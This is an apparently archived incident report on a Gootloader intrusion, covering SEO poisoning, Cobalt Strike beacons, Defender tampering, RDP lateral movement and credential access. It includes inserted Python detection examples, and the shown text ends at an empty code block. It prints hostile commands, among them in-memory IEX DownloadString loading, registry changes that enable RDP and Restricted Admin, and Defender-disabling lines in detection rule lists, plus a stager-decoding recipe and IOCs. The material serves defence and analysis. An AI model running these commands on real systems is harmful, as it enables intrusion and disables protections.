{
	"id": "141d1077-64cb-4717-a248-88233407dbb8",
	"created_at": "2026-04-06T02:12:02.380274Z",
	"updated_at": "2026-04-10T13:12:24.833432Z",
	"deleted_at": null,
	"sha1_hash": "98656c9d160044911262ba48761c147e58a78340",
	"title": "SEO Poisoning to Domain Control: The Gootloader Saga Continues",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 14864761,
	"plain_text": "SEO Poisoning to Domain Control: The Gootloader Saga\r\nContinues\r\nBy editor\r\nPublished: 2024-02-26 · Archived: 2026-04-06 01:30:23 UTC\r\nKey Takeaways\r\nIn February 2023, we detected an intrusion that was initiated by a user downloading and executing a file\r\nfrom a SEO-poisoned search result, leading to a Gootloader infection.\r\nAround nine hours after the initial infection, the Gootloader malware facilitated the deployment of a Cobalt\r\nStrike beacon payload directly into the host’s registry, and then executed it in memory.\r\nThe threat actor deployed SystemBC to tunnel RDP access into the network, which aided in compromising\r\ndomain controllers, backup servers, and other key servers.\r\nThe threat actor conducted an interactive review of sensitive and confidential files using RDP; however, we\r\nhave been unable to confirm whether any data was actually exfiltrated.\r\nMore information about Gootloader can be found in the following reports: The DFIR Report, GootloaderSites,\r\nMandiant, Red Canary, \u0026 Kroll.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nSubmit your feedback on this report for a chance to win free swag!\r\nThe DFIR Report Services\r\nWe provide a range of services including Private Threat Briefs, which includes 25+ private reports yearly. 
These\r\nreports follow a format similar to our public reports but are more concise in nature and are published within weeks\r\nof the intrusion.\r\nAnother service we provide is our Threat Feed, specializing in tracking Command and Control frameworks such\r\nas Cobalt Strike, Metasploit, Sliver, and more.\r\nOur comprehensive All Intel service includes the Private Threat Briefs and Threat Feed, with additional insights\r\nsuch as private events, long-term infrastructure tracking, clustering of intrusion data, Cobalt Strike configurations,\r\nC2 domains, and more.\r\nWe also offer a Private Ruleset which consists of exclusively curated rules using insights derived from Private\r\nThreat Briefs and other internal cases. This ruleset currently encompasses 100+ Sigma rules, created from the\r\nknowledge of 40+ cases. Each rule is mapped to ATT\u0026CK and accompanied by a test example.\r\nWe invite you to reach out for a personalized demo of our services via our Contact Us page.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 1 of 54\n\nTable of Contents:\r\nCase Summary\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThe intrusion started in February 2023, when a user conducted a search for “Implied Employment Agreement”.\r\nThe people behind Gootloader frequently exploit terms related to contracts and agreements for search engine\r\noptimization (SEO) poisoning. In this instance, the user encountered a SEO-poisoned result and clicked on it. This\r\naction directed them to a compromised website that mimicked a user forum. 
On this webpage, a deceptive link\r\nenticed the user to download what was supposed to be an employment agreement.\r\nUpon opening the received zip file, the user saw a JavaScript file bearing a name similar to their initial search\r\nterm. Clicking on this file triggered the Gootloader malware’s execution process. This led to the creation of a new\r\nJavaScript file within the user’s AppData folder. To ensure its continuous operation, Gootloader established a\r\nscheduled task to run this newly created file, incorporating a logon trigger for persistence. The sequence ends with\r\nthe execution of an obfuscated PowerShell script, which calls another PowerShell script.\r\nThis script performs some basic discovery of information about the host using built-in PowerShell Cmdlets and\r\nWMI queries. The script then reaches out to a rotating list of remote endpoints. Around nine hours after the initial\r\nexecution, one of the remote endpoints responded to the Gootloader malware, providing a download that was\r\nwritten to two registry keys. Those registry keys contained an obfuscated launcher for Gootloader and a Cobalt\r\nStrike beacon, which was loaded directly into memory.\r\nNext, an instance of process injection into dllhost was detected, accompanied by network connections to several\r\nremote hosts checking for LDAP and SMB. Additionally, LDAP network traffic directed to a domain controller\r\nwas observed, indicating discovery operations targeting various groups, including Domain Users, Administrators,\r\nRDP Users, and Domain Administrators.\r\nApproximately ten minutes after these activities, the threat actor initiated lateral movement within the network.\r\nThis involved creating a remote service to disable Windows Defender’s Real-Time Monitoring. 
Subsequently,\r\nthey transferred a Cobalt Strike beacon executable over SMB and executed it as a service. Following this,\r\nadditional process injections and access to LSASS memory were observed on the compromised hosts.\r\nThe threat actor continued trying this method to move to various workstations and domain controllers. However,\r\non the domain controllers, Windows Defender remained operational and successfully thwarted the attempts to\r\nlaunch the beacons. Despite these setbacks, the attacker continued their efforts from a compromised workstation,\r\nutilizing PowerView to conduct additional discovery tasks.\r\nTo breach the domain controller, the threat actor adjusted their strategy. They introduced a new PowerShell script,\r\na PowerShell implementation of SystemBC, onto a workstation and executed it. This script initiated\r\ncommunication with a command and control server and established persistence by creating a registry run key.\r\nFollowing this setup, the threat actor executed multiple commands through remote services on a domain controller\r\nto ensure RDP access was enabled. They then logged into the domain controller over RDP by routing the\r\nconnection through the infected workstation using SystemBC.\r\nHaving gained access to the domain controller, the threat actor transferred a text file containing a series of\r\ncommands through their RDP session, aimed at further attempts to disable Windows Defender. Despite these\r\nefforts, their attempt to deploy a PowerShell beacon seemed to be unsuccessful. Not deterred, they proceeded to\r\ninstall Advanced IP Scanner on the domain controller and initiated a network scan. 
While that was running, they\r\nexplored a remote file share, during which they accessed a document containing password-related information.\r\nThe threat actor next turned their attention to a backup server, utilizing Windows Remote Management (WinRM)\r\nto execute multiple commands, ensuring that RDP access to the server was enabled and open. After ensuring RDP\r\nwas available, they connected to the server via RDP and proceeded to review the backup configurations for the\r\nenvironment. During this time, they also deployed the SystemBC PowerShell script on the server. After this\r\nactivity, there was a noticeable lull in the threat actor’s actions, with no significant activities recorded for the next\r\nfive hours. Upon returning, the threat actor resumed accessing hosts over RDP.\r\nThe threat actor resumed their search for sensitive information by looking through file shares for documents\r\npertaining to passwords, while operating from the backup server. Additionally, they executed Advanced IP\r\nScanner again, this time from the backup server. Throughout their RDP session, they interactively viewed data, yet\r\nno direct signs of data exfiltration were observed during this phase of activity. After this, the threat actor’s\r\npresence on the network ceased, and they were not detected again prior to being evicted from the network.\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0, @malforsec \u0026 @r3nzsec\r\nInitial Access\r\nThe initial access was achieved by the user navigating to a SEO-poisoned website via Google search. 
Once\r\nopened, the site masquerades as a forum with a download link to an ‘Implied Employment Agreement’\r\ndocument.\r\nIn our previous analysis of Gootloader, detailed in our report “SEO Poisoning: A Gootloader Story,” we examined\r\nthe same initial access technique employed by these threat actors. For a better understanding, that report includes a video\r\nthat visually demonstrates the user’s journey from SEO poisoning to encountering Gootloader\r\nmalware.\r\nThe ‘Implied Employment Agreement’ turned out to be a zip archive containing the GootLoader multistage loader.\r\nWe can see from the Zone.Identifier alternate data stream below that the zip was downloaded from the internet\r\n(ZoneId=3, the Internet zone).\r\nBelow depicts the process of the start of the Gootloader infection:\r\nExecution\r\nGootloader involves several execution steps across the whole infection chain.\r\nThe JavaScript file was executed after the user double-clicked on it within the opened zip archive.\r\nExecution of the JavaScript file drops another JavaScript file named “Frontline Management.js”. This dropped\r\nJavaScript is heavily obfuscated.\r\nIn addition to the file, a new scheduled task named ‘InfrSiRfucture Technologies’ was created. This task was then\r\ninvoked to run the new JavaScript file. The infection chain continues with a PowerShell script. 
The execution\r\nchain here is Svchost.exe (Scheduled Task) ➝ Wscript.exe ➝ Cscript.exe ➝ Powershell.exe\r\nThe PowerShell script included URLs to ten remote servers:\r\nNot all the included remote servers were weaponized at the time of execution, so some servers answered with\r\nHTTP 405 “Method Not Allowed”.\r\nFor the server that was weaponized, however, there is a different response. For this intrusion, that was\r\n46.28.105[.]94 with the URL “hxxp://blog[.]lilianpraskova[.]cz/xmlrpc[.]php”. The server then started answering\r\nwith the HTTP status code 200 “OK” and delivering the final stage in the Gootloader infection.\r\nThe final download contained three different components: Gootloader stage 1 (parameter $cXqt), which was an\r\nobfuscated DLL; Gootloader stage 2 (parameter $IbaY), which ended up as an EXE file when deobfuscated; and a\r\nscript that wrote stage 1 and stage 2 into the registry before deobfuscating stage 1 and loading it into memory. Stage 1\r\ntook care of the deobfuscation of stage 2, the final payload for Gootloader, and loaded what we will later see is a\r\nCobalt Strike Beacon.\r\nThe encoded PowerShell command that ran is beautified and decoded below.\r\nHere’s the decoded value:\r\n609265940; sleep -s (20); 60213434; $sxd=\"hkcu:\\software\\microsoft\\Personalization\\geRBAdXTDCkN\"; $tG\r\nDecoding the JavaScript stager payload manually could be time-consuming, so we used this fantastic script made\r\nby Mandiant. 
This is a collection of scripts used to deobfuscate Gootloader malware samples. We used the\r\nGootLoaderAutoJSDecode.py Python script that automatically decodes .js files using static analysis.\r\nPersistence\r\nGootloader\r\nA scheduled task was created during the initial Gootloader execution. This task was run on demand to execute the\r\nnext stage in the Gootloader malware chain, and set up a logon trigger to maintain persistence on the beachhead.\r\nSystemBC\r\nLater in the intrusion the threat actor deployed a SystemBC PowerShell script. They set up persistence for this\r\nscript by using a Run key entry named ‘socks_powershell’.\r\nPrivilege Escalation\r\nThe use of the Cobalt Strike ‘getsystem’ command was evident, with cmd being spawned from the beacon\r\n(DLLHOST) to elevate to a ‘SYSTEM’ context.\r\nDetails of the technique are documented here: https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem\r\nThroughout the intrusion, new logon sessions were initiated using tokens created from harvested credentials.\r\nInitially, a sacrificial process, dllhost.exe, was launched from the PowerShell payload using the credentials of the\r\ncompromised beachhead account.\r\nUsing a harvested credential, a new logon session was created. 
This was logged under Windows event ID 4624,\r\nshowing the initial Logon ID followed by the new Logon ID for the target user account.\r\nThe newly created logon session (Logon ID) was assigned special privileges (elevated) as detailed in event ID\r\n4672.\r\nThis resulted in cmd.exe running under the new, elevated logon session.\r\nThe threat actor targeted several accounts using the same technique; these were:\r\nThe threat actor pivoted across compromised accounts and across several endpoints with relative ease.\r\nMultiple detection opportunities exist, including correlating atypical logons to high-privilege accounts from\r\nunexpected accounts or workstations, and the assignment of special privileges to a logon ID by standard users.\r\nA ‘Logon type 9’ (NewCredentials) together with a logon process of ‘seclogo’ strongly indicates the use of alternate\r\ncredentials, equivalent to ‘runas /netonly’; this is what Cobalt Strike’s make_token and ‘pass the hash’ commands produce.\r\n(https://www.cobaltstrike.com/blog/windows-access-tokens-and-alternate-credentials).\r\nDefense Evasion\r\nOn the beachhead host, to avoid dropping files to disk, several registry keys were created to store the payloads\r\nunder:\r\nHKCU\\Software\\Microsoft\\Personalization\r\nEach key has an associated payload (stage 1 and 2). 
These keys stored the data for the Cobalt Strike beacon\r\nexecuted on the beachhead.\r\ngeRBAdXTDCkN\r\ncbkSBtbjQBNFy\r\nExecution of the payload to run the Cobalt Strike beacon can be observed in base64-encoded PowerShell\r\ncommands.\r\nDuring the intrusion we observed activity related to Windows Defender tampering. These commands were executed\r\nremotely on hosts using Cobalt Strike lateral movement modules such as psexec_psh. Scheduled scanning tasks were deleted,\r\nand a service was created to disable real-time monitoring.\r\nScheduled task commands\r\nRemote Desktop\r\nRestricted Admin Mode was enabled by setting the DisableRestrictedAdmin value to 0.\r\nEnabling Restricted Admin Mode allows the attacker to log in over RDP with a collected NTLM hash instead of a password. An\r\nexplanation can be found here [https://github.com/GhostPack/RestrictedAdmin]. 
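The RDP and Defender changes used in this intrusion (fDenyTSConnections and DisableRestrictedAdmin set to 0, netsh firewall rule groups enabled, Set-MpPreference and deleted Defender scan tasks) all leave a process-creation trail. The Python below is an added example and not part of the original report: its 4688-style records are constructed to mirror the command shapes described in this case, and the field names Computer, User and CommandLine are assumed from a typical SIEM export.

```python
# Added example (not from the report): flag RDP / Defender tampering commands
# in process-creation telemetry (Windows 4688 or Sysmon event 1).
# Sample command lines below are constructed for this example.
import re

# (rule name, regex over the normalised command line, what the change enables)
TAMPER_RULES = [
    ('rdp_enabled',
     re.compile(r'reg\s+add\b.*terminal server.*fdenytsconnections.*/d\s*0'),
     'fDenyTSConnections=0 allows inbound RDP'),
    ('restricted_admin_enabled',
     re.compile(r'reg\s+add\b.*control\\lsa.*disablerestrictedadmin.*/d\s*0'),
     'DisableRestrictedAdmin=0 permits RDP logon with an NTLM hash'),
    ('rdp_firewall_group',
     re.compile(r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group=\s*\S*remote (desktop|admin)\S*.*enable=\s*yes'),
     'Remote Desktop / Remote Administration firewall rule group opened'),
    ('defender_realtime_off',
     re.compile(r'set-mppreference\b.*-disablerealtimemonitoring\s+\$?true'),
     'Defender real-time monitoring disabled'),
    ('defender_task_removed',
     re.compile(r'schtasks\s+/delete\b.*windows defender'),
     'Defender scheduled scan task deleted'),
]

def normalise(cmdline):
    '''Lower-case and strip quotes so rules do not depend on quoting style.'''
    return re.sub(r'[\'\"]', '', cmdline).lower()

def classify(cmdline):
    '''Return the names of every tamper rule matching one command line.'''
    norm = normalise(cmdline)
    return [name for name, rx, _ in TAMPER_RULES if rx.search(norm)]

def triage(process_events):
    '''process_events: iterable of dicts with Computer, User and CommandLine.'''
    findings = []
    for ev in process_events:
        for name in classify(ev['CommandLine']):
            findings.append((ev['Computer'], ev['User'], name))
    return findings

# Constructed sample records; hostnames and users are invented.
SAMPLE_4688 = [
    {'Computer': 'DC01', 'User': 'SYSTEM',
     'CommandLine': 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /f /v fDenyTSConnections /t REG_DWORD /d 0'},
    {'Computer': 'DC01', 'User': 'SYSTEM',
     'CommandLine': 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0'},
    {'Computer': 'DC01', 'User': 'SYSTEM',
     'CommandLine': 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {'Computer': 'WKSTN02', 'User': 'SYSTEM',
     'CommandLine': 'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {'Computer': 'WKSTN02', 'User': 'SYSTEM',
     'CommandLine': 'schtasks /Delete /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /F'},
    {'Computer': 'WKSTN03', 'User': 'jsmith',   # benign: should not fire
     'CommandLine': 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'},
]

if __name__ == '__main__':
    for host, user, rule in triage(SAMPLE_4688):
        print(host, user, rule)
```

Normalising quotes before matching matters because operators vary between a quoted "Terminal Server" path and unquoted forms; the explicit value check (/d 0) keeps a hardening command that sets fDenyTSConnections to 1 from firing.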
The same technique has been\r\nobserved in use by SVR and various other threat actors.\r\nThe same technique was also observed in a previous Gootloader case as well as two other public cases.\r\nThe second registry modification allowed RDP connections by changing the ‘fDenyTSConnections’ setting.\r\nWindows Firewall\r\nOn the domain controller, ‘netsh’ was used to enable the Remote Desktop firewall rule group,\r\nfollowed by the Remote Administration rule group.\r\nProcess Injection\r\nWe observed process injection activity, with PowerShell and dllhost being utilized to load Cobalt Strike beacons\r\ninto memory on the beachhead host.\r\nThis can be observed in the memory dump from the beachhead host with the tell-tale\r\nPAGE_EXECUTE_READWRITE protection on the memory regions and MZ headers observable in the\r\nprocess memory space.\r\nDuring the intrusion, we observed multiple named pipes utilized by the threat actor’s Cobalt Strike injected\r\nbeacons via PowerShell and dllhost:\r\nPipeName: \\4fcc39\r\nPipeName: \\netsvc\\1324\r\nPipeName: \\4fcc39\r\nPipeName: \\netsvc\\415\r\nCredential Access\r\nAcross the compromised endpoints where a Cobalt Strike beacon was deployed, the LSASS process was accessed\r\nto retrieve in-memory credentials.\r\nA CallTrace containing ‘UNKNOWN’ frames indicates the call originated from injected code not backed by any loaded\r\nmodule, while a GrantedAccess of 0x1010 is typical behavior of credential-stealing tools such as Mimikatz. 
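The two LSASS indicators (UNKNOWN frames in the CallTrace and the 0x1010 access mask) and the Logon Type 9 / seclogo pattern from the Privilege Escalation section can be checked programmatically from event exports. This Python is an added example, not from the report: the Sysmon event 10 and Security 4624/4672 records are constructed for illustration (hostnames, users and Logon IDs are invented) and only the field names follow the Windows and Sysmon schemas.

```python
# Added example (not from the report): triage of LSASS access and
# alternate-credential logons over constructed sample events. Events are
# assumed to be dicts with Windows / Sysmon field names, as a SIEM export
# would give them; the records below are invented.

# Subset of PROCESS_* access rights relevant to credential theft from lsass.
ACCESS_RIGHTS = {
    0x0001: 'PROCESS_TERMINATE',
    0x0008: 'PROCESS_VM_OPERATION',
    0x0010: 'PROCESS_VM_READ',
    0x0020: 'PROCESS_VM_WRITE',
    0x0040: 'PROCESS_DUP_HANDLE',
    0x0080: 'PROCESS_CREATE_PROCESS',
    0x0400: 'PROCESS_QUERY_INFORMATION',
    0x1000: 'PROCESS_QUERY_LIMITED_INFORMATION',
    0x100000: 'SYNCHRONIZE',
}

def decode_access_mask(mask):
    '''Expand a GrantedAccess bitmask into the named rights it contains.'''
    return [name for bit, name in sorted(ACCESS_RIGHTS.items()) if mask & bit]

def flag_lsass_access(sysmon_events):
    '''Return Sysmon event 10 records that read lsass memory from unbacked code.

    Two signals are combined: the mask grants PROCESS_VM_READ (needed to scrape
    credentials) and the CallTrace contains UNKNOWN frames, i.e. return
    addresses not backed by any loaded module, typical of injected beacons.'''
    hits = []
    for ev in sysmon_events:
        if ev.get('EventID') != 10:
            continue
        if not ev['TargetImage'].lower().endswith('lsass.exe'):
            continue
        rights = decode_access_mask(int(ev['GrantedAccess'], 16))
        unbacked = 'UNKNOWN' in ev.get('CallTrace', '')
        if 'PROCESS_VM_READ' in rights and unbacked:
            hits.append({'source': ev['SourceImage'], 'rights': rights})
    return hits

def find_seclogo_token_logons(security_events):
    '''Correlate 4624 Logon Type 9 / seclogo with 4672 on the same Logon ID.

    Logon type 9 (NewCredentials) with LogonProcessName seclogo is what
    runas /netonly, Cobalt Strike make_token and pass-the-hash produce.
    Pairing it with a 4672 (special privileges assigned) for the new Logon ID
    surfaces the elevated token creation described above.'''
    privileged = {ev['SubjectLogonId'] for ev in security_events if ev.get('EventID') == 4672}
    findings = []
    for ev in security_events:
        if ev.get('EventID') != 4624 or ev.get('LogonType') != 9:
            continue
        if ev.get('LogonProcessName', '').lower() != 'seclogo':
            continue
        findings.append({
            'host': ev['Computer'],
            'from': ev['SubjectUserName'],
            'as': ev['TargetUserName'],
            'logon_id': ev['TargetLogonId'],
            'elevated': ev['TargetLogonId'] in privileged,
        })
    return findings

# Constructed sample records (all values invented for this example).
SAMPLE_SYSMON = [
    {'EventID': 10, 'SourceImage': 'C:\\Windows\\System32\\dllhost.exe',
     'TargetImage': 'C:\\Windows\\system32\\lsass.exe', 'GrantedAccess': '0x1010',
     'CallTrace': 'C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(00000210B9E71C3D)'},
    {'EventID': 10, 'SourceImage': 'C:\\Windows\\System32\\taskmgr.exe',   # benign
     'TargetImage': 'C:\\Windows\\system32\\lsass.exe', 'GrantedAccess': '0x1400',
     'CallTrace': 'C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\System32\\KERNELBASE.dll+2c1fe'},
]
SAMPLE_SECURITY = [
    {'EventID': 4624, 'Computer': 'WKSTN01', 'LogonType': 9, 'LogonProcessName': 'seclogo',
     'SubjectUserName': 'jsmith', 'TargetUserName': 'backupadmin', 'TargetLogonId': '0x3a7f1c'},
    {'EventID': 4672, 'Computer': 'WKSTN01', 'SubjectLogonId': '0x3a7f1c'},
    {'EventID': 4624, 'Computer': 'WKSTN01', 'LogonType': 2, 'LogonProcessName': 'User32',   # interactive, benign
     'SubjectUserName': '-', 'TargetUserName': 'jsmith', 'TargetLogonId': '0x1b2c3'},
]

if __name__ == '__main__':
    for hit in flag_lsass_access(SAMPLE_SYSMON):
        print('LSASS read from unbacked code:', hit)
    for finding in find_seclogo_token_logons(SAMPLE_SECURITY):
        print('Alternate-credential logon:', finding)
```

The 0x1400 record is kept deliberately: Task Manager and other legitimate tools query lsass with PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION and never need PROCESS_VM_READ, which is why the mask decoding rather than the raw value drives the decision.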
The code 0x1010 can be broken down into the following\r\naccess rights:\r\n0x00000010 = PROCESS_VM_READ\r\n0x00001000 = PROCESS_QUERY_LIMITED_INFORMATION\r\nThe operator spent some time accessing and viewing files. Files of most interest were those that could\r\nindicate credential storage. In this intrusion ‘Notepad’ was used to view a file within a Passwords file share\r\nlocation.\r\nDiscovery\r\nGootloader\r\nBefore hands-on-keyboard activity, Gootloader ran a number of PowerShell Cmdlets to collect basic host\r\ninformation.\r\nThe first section collected environmental data from the host using env:\r\nNext the host operating system using Get-WmiObject:\r\nFollowed by running processes, with a filter on MainWindowTitle, using Get-Process.\r\nNo filter:\r\nWith filter:\r\nAnd a disk space check using Get-PSDrive:\r\nRDP Port Discovery\r\nAdvanced IP Scanner (https://www.advanced-ip-scanner.com/) was executed from a compromised account and\r\nthen used to look for systems with RDP (3389) open.\r\nLDAP\r\nThe DLLHost process (Cobalt Strike beacon) undertook several LDAP (Lightweight Directory Access Protocol)\r\nqueries over ports 389 (LDAP) and 3268 (Global Catalog).\r\nShares Enumeration\r\nScanning all the network endpoints for the presence of shared folders was undertaken. 
This is a common\r\ntechnique we’ve observed in other similar cases to discover and collect information of interest, e.g., credentials and\r\nconfidential information.\r\nPing\r\nThe DLLHost (Cobalt Strike beacon) conducted several ping sweeps across endpoints using the ‘ping’ command:\r\nThe use of the ping command had several unusual indicators. The command was executed from the SYSTEM\r\naccount, and a conhost process was created with no attached console session [https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-wtsgetactiveconsolesessionid#return-value].\r\nMultiple executions of ‘ping’ with these indicators:\r\nAD Groups\r\nThe threat actor enumerated the “Remote Management Users”, “Remote Desktop Users”, “Local Administrators”\r\nand “Distributed COM Users” groups.\r\nPowerSploit\r\nPowerView Cmdlets, part of PowerSploit, were observed being used to discover the domain configuration.\r\nObserved Cmdlets included Get-DomainFileServer and Get-DomainSearcher. This was passed as a base64-encoded\r\nvalue, from a user context of SYSTEM. 
The Base64 prefix SQB corresponds to the UTF-16LE encoding of ‘IEX’ (Invoke-Expression),\r\ncommonly used to execute a downloaded script in memory.\r\nThe command:\r\nDecoded as:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:12210/'); Get-DomainFileServer\r\nThe use of the loopback address [127.0.0.1] indicates that the script was served by the implant itself\r\n[dllhost] rather than fetched from a remote host; this is how Cobalt Strike’s powershell-import and powershell commands stage a script locally.\r\nInvocation of the Get-DomainSearcher function as part of the Get-DomainFileServer execution:\r\nLateral Movement\r\nCobalt Strike beacons were deployed across several endpoints using remote service creation. Services were\r\ncreated either with base64-encoded PowerShell payloads or with a dropped executable.\r\nCobalt Strike beacon PowerShell payloads have recognizable indicators, including a random service name, use of\r\nCOMSPEC, and PowerShell parameters. 
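Decoding the -EncodedCommand values seen in the PowerView and service-payload commands is routine triage. The Python below is an added example, not from the report: it encodes two constructed commands the way PowerShell does (UTF-16LE, then base64), which is exactly why the SQB prefix identifies a leading IEX and JAB a leading $, and it pulls out the 127.0.0.1 download string that reveals a beacon-hosted script. The PowerView command is the one decoded above; the stager-style command is an approximation of the usual shape, not a copy of an artefact from this case.

```python
# Added example (not from the report): decode PowerShell -EncodedCommand
# values and apply the prefix heuristics discussed in this section.
# Sample commands are constructed here.
import base64
import re

def encode_command(script):
    '''Encode a script the way powershell -EncodedCommand expects (UTF-16LE, base64).'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')

def decode_command(blob):
    '''Reverse of encode_command; raises on anything that is not valid base64.'''
    return base64.b64decode(blob, validate=True).decode('utf-16-le')

# Because every other byte of UTF-16LE ASCII is 0x00, the first three base64
# characters depend only on the first character of the script.
PREFIX_HINTS = {
    'SQB': 'IEX (Invoke-Expression: executes downloaded or inline script)',
    'JAB': '$ (command starts with a variable assignment, e.g. a stager)',
    'cAB': 'p (often a nested powershell invocation)',
}

def prefix_for_char(ch):
    '''Compute the 3-char base64 prefix produced by a leading ASCII character.'''
    return base64.b64encode(ch.encode('utf-16-le') + b'A')[:3].decode('ascii')

def triage_encoded_command(blob):
    '''Return prefix meaning, IEX use and any URLs found in an encoded command.'''
    script = decode_command(blob)
    urls = re.findall(r'https?://[^\s\'\)]+', script)
    return {
        'prefix': blob[:3],
        'prefix_hint': PREFIX_HINTS.get(blob[:3], 'unknown'),
        'uses_iex': bool(re.search(r'(?i)\bIEX\b|Invoke-Expression', script)),
        'urls': urls,
        'served_by_local_beacon': any(u.startswith('http://127.0.0.1') for u in urls),
        'script': script,
    }

# Constructed samples: the first reproduces the PowerView invocation decoded
# above; the second approximates a Cobalt Strike PowerShell stager wrapper.
SAMPLE_POWERVIEW = encode_command(
    'IEX (New-Object Net.Webclient).DownloadString(\'http://127.0.0.1:12210/\'); Get-DomainFileServer')
SAMPLE_STAGER = encode_command(
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\'H4sIAAAA\'));'
    'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
    '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()')

if __name__ == '__main__':
    for blob in (SAMPLE_POWERVIEW, SAMPLE_STAGER):
        result = triage_encoded_command(blob)
        print(result['prefix'], result['prefix_hint'], result['uses_iex'], result['urls'])
```

The prefix table is only a fast first look; the decision to escalate should come from the decoded script (IEX plus a loopback or external URL), since an operator can defeat the prefix check simply by starting the command with a space or a comment.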
A Base64 string starting with JAB corresponds to a UTF-16LE ‘$’, i.e. the command begins with a\r\nvariable assignment.\r\nCompiled Cobalt Strike beacons were dropped onto Domain Controllers.\r\nThis particular beacon was detected by the host AV [Windows Defender event ID 1117] and removed.\r\nCobalt Strike beacons distributed with SMB admin shares\r\nThe diagram below shows the distribution of Cobalt Strike beacons to hosts in the environment over SMB admin\r\nshares.\r\nWMI used to start remote process\r\nIn this intrusion, the “reg add” command was executed remotely through WMI to attempt to permit RDP\r\nconnections by setting the “fDenyTSConnections” value to 0 (connections allowed), as shown in the network traffic capture\r\nbelow.\r\nreg add \"HKLM\\SYSTEM\\CurrrentControlSet\\Control\\Terminal Server\" /f /v fDenyTSConnections /t REG_DWOR\r\nThe threat actor again executed a command to modify the registry key to enable Restricted Admin mode remotely\r\nvia WMI. This activity was captured via Windows event ID 4688.\r\nRemote Desktop Protocol\r\nRDP was used to move laterally between several hosts. The diagram below shows the RDP connections made by\r\nthe threat actor.\r\nThe Windows event log for RDP, “RemoteDesktopServices-RdpCoreTS/Operational” event ID 131, shows RDP activity\r\nwith details like client IP and source port.\r\nRemote Service creation with MSRPC\r\nThe threat actor utilized RPC to create services remotely. Remote service creation through the MSRPC Service Control Manager (SCM)\r\ninterface is how Cobalt Strike’s psexec-family commands execute code on remote hosts. Here the CreateWowService call is used to run a\r\nPowerShell command that disables Windows Defender Real-Time Monitoring. 
Adding the account’s password or NTLM hash\r\nto Wireshark’s NTLMSSP protocol preferences allows the traffic to be decrypted.\r\nHands On Keyboard\r\nUsing a compromised account, the threat actor was observed moving payloads between hosts using Notepad. The\r\nfile they dropped the content into was aptly named ‘payload.txt’.\r\nThe file payload.txt was captured on a network share before the threat actor dropped the content into a text file with\r\nNotepad. The data contained both an encoded PowerShell command and several commands to disable\r\nfunctionality in Windows Defender.\r\nSysmon event ID 24 (clipboard change) shows the threat actor copying the data, and also records the threat actor’s\r\nhostname as DESKTOP-GRALDC5.\r\nCollection\r\nBesides the password-related documents mentioned under Credential Access, other sensitive files were accessed using\r\nWordPad. Some files of interest were legal-related files and folders such as Contracts.\r\nCommand and Control\r\nCobalt Strike\r\nThe Cobalt Strike server used for this intrusion had been tracked in the DFIR Report threat intelligence feed\r\nbefore the incident occurred.\r\n91.215.85.143:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3S: f176ba63b4d68e576b5ba345bec2c7b7\r\nCS Stager\r\nDuring the intrusion, we also observed malicious PowerShell execution containing base64 strings on the\r\ndomain controller.\r\nAfter decoding the base64 strings using CyberChef, the output looks cleaner. 
However, we also noticed\r\na second layer of obfuscation in the output.\r\nAfter the initial Base64 decoding, we found the payload used the default Cobalt Strike XOR key of 35. The decompressed script\r\ncontains a further base64 string which, once decoded and XORed with 35, yields the stager.\r\nThe CyberChef recipe below chains these steps: extract the base64 blob, decode it, gunzip, extract the inner blob, decode it and XOR with 35.\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List match\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List match\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nThe data can be saved and parsed using the 1768.py tool from Didier Stevens, which reveals the Cobalt Strike stager\r\nconfiguration, including the C2 IP (91.215.85[.]143) and the license ID (watermark) 206546002, a\r\nwell-known watermark seen in multiple attacks covered by our previously published reports.\r\nOn the beachhead host the Cobalt Strike beacon was injected into PowerShell and DLLHost processes; these served\r\nas the main ingress and egress command and control channel to 91.215.85[.]143:443.\r\nCS HTTP Beacon\r\nThe threat actor used Cobalt Strike HTTP Beacons for command and control communication. 
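The stager de-layering from the CS Stager section above, as a Python equivalent of the CyberChef recipe. This is an added example and not from the report: it embeds no real stager. Instead build_sample() constructs one with the same layering (base64, gzip, inner base64, XOR 35) around a placeholder payload so the unwrapping can be exercised offline; the PowerShell wrapper text it generates is an assumed approximation of the usual stager shape.

```python
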